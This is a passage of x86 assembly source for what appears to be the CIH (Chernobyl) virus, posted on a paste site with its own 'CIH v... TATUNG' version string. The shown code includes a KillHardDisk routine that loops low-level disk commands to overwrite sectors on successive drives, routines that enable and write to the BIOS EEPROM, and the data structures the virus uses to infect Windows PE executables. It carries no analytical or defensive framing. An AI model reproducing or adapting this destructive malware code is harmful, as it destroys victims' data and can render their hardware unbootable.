- ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
- ; ***************************************************
- KillHardDisk:
- xor ebx, ebx
- mov bh, FirstKillHardDiskNumber
- push ebx
- sub esp, 2ch
- push 0c0001000h
- mov bh, 08h
- push ebx
- push ecx
- push ecx
- push ecx
- push 40000501h
- inc ecx
- push ecx
- push ecx
- mov esi, esp
- sub esp, 0ach
- LoopOfKillHardDisk:
- int 20h
- dd 00100004h ; VXDCall IOS_SendCommand
- cmp word ptr [esi+06h], 0017h
- je KillNextDataSection
- ChangeNextHardDisk:
- inc byte ptr [esi+4dh]
- jmp LoopOfKillHardDisk
- KillNextDataSection:
- add dword ptr [esi+10h], ebx
- mov byte ptr [esi+4dh], FirstKillHardDiskNumber
- jmp LoopOfKillHardDisk
- ; ***************************
- ; * Enable EEPROM to Write *
- ; ***************************
- EnableEEPROMToWrite:
- mov [eax], cl
- mov [ecx], al
- mov byte ptr [eax], 80h
- mov [eax], cl
- mov [ecx], al
- ret
- ; ***************************
- ; * IO for EEPROM *
- ; ***************************
- IOForEEPROM:
- @10 = IOForEEPROM
- xchg eax, edi
- xchg edx, ebp
- out dx, eax
- xchg eax, edi
- xchg edx, ebp
- in al, dx
- BooleanCalculateCode = $
- or al, 44h
- xchg eax, edi
- xchg edx, ebp
- out dx, eax
- xchg eax, edi
- xchg edx, ebp
- out dx, al
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- LastVxDCallAddress = IFSMgr_Ring0_FileIO
- VxDCallAddressTable db 00h
- db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
- db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
- db IFSMgr_Ring0_FileIO-UniToBCSPath
- VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
- VxDCallTableSize = ($-VxDCallIDTable)/04h
- ; *********************************************************
- ; * Virus Version Copyright *
- ; *********************************************************
- VirusVersionCopyright db 'CIH v'
- db MajorVirusVersion+'0'
- db '.'
- db MinorVirusVersion+'0'
- db ' TATUNG'
- ; *********************************************************
- ; * Virus Size *
- ; *********************************************************
- VirusSize = $
- ; + SizeOfVirusCodeSectionTableEndMark(04h)
- ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
- ; + SizeOfTheFirstVirusCodeSectionTable(04h)
- ; *********************************************************
- ; * Dynamic Data *
- ; *********************************************************
- VirusGameDataStartAddress = VirusSize
- @6 = VirusGameDataStartAddress
- OnBusy db 0
- FileModificationTime dd ?
- FileNameBuffer db FileNameBufferSize dup(?)
- @7 = FileNameBuffer
- DataBuffer = $
- @8 = DataBuffer
- NumberOfSections dw ?
- TimeDateStamp dd ?
- SymbolsPointer dd ?
- NumberOfSymbols dd ?
- SizeOfOptionalHeader dw ?
- _Characteristics dw ?
- Magic dw ?
- LinkerVersion dw ?
- SizeOfCode dd ?
- SizeOfInitializedData dd ?
- SizeOfUninitializedData dd ?
- AddressOfEntryPoint dd ?
- BaseOfCode dd ?
- BaseOfData dd ?
- ImageBase dd ?
- @9 = $
- SectionAlignment dd ?
- FileAlignment dd ?
- OperatingSystemVersion dd ?
- ImageVersion dd ?
- SubsystemVersion dd ?
- Reserved dd ?
- SizeOfImage dd ?
- SizeOfHeaders dd ?
- SizeOfImageHeaderToRead = $-NumberOfSections
- NewAddressOfEntryPoint = DataBuffer ; DWORD
- SizeOfImageHeaderToWrite = 04h
- StartOfSectionTable = @9
- SectionName = StartOfSectionTable ; QWORD
- VirtualSize = StartOfSectionTable+08h ; DWORD
- VirtualAddress = StartOfSectionTable+0ch ; DWORD
- SizeOfRawData = StartOfSectionTable+10h ; DWORD
- PointerToRawData = StartOfSectionTable+14h ; DWORD
- PointerToRelocations = StartOfSectionTable+18h ; DWORD
- PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
- NumberOfRelocations = StartOfSectionTable+20h ; WORD
- NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
- Characteristics = StartOfSectionTable+24h ; DWORD
- SizeOfScetionTable = Characteristics+04h-SectionName
- ; *********************************************************
- ; * Virus Total Need Memory *
- ; *********************************************************
- VirusNeedBaseMemory = $
- VirusTotalNeedMemory = @9
- ; + NumberOfSections(??)*SizeOfScetionTable(28h)
- ; + SizeOfVirusCodeSectionTableEndMark(04h)
- ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
- ; + SizeOfTheFirstVirusCodeSectionTable(04h)
- ; *********************************************************
- ; *********************************************************
- VirusGame ENDS
- END FileHeader
Add Comment
Please, Sign In to add comment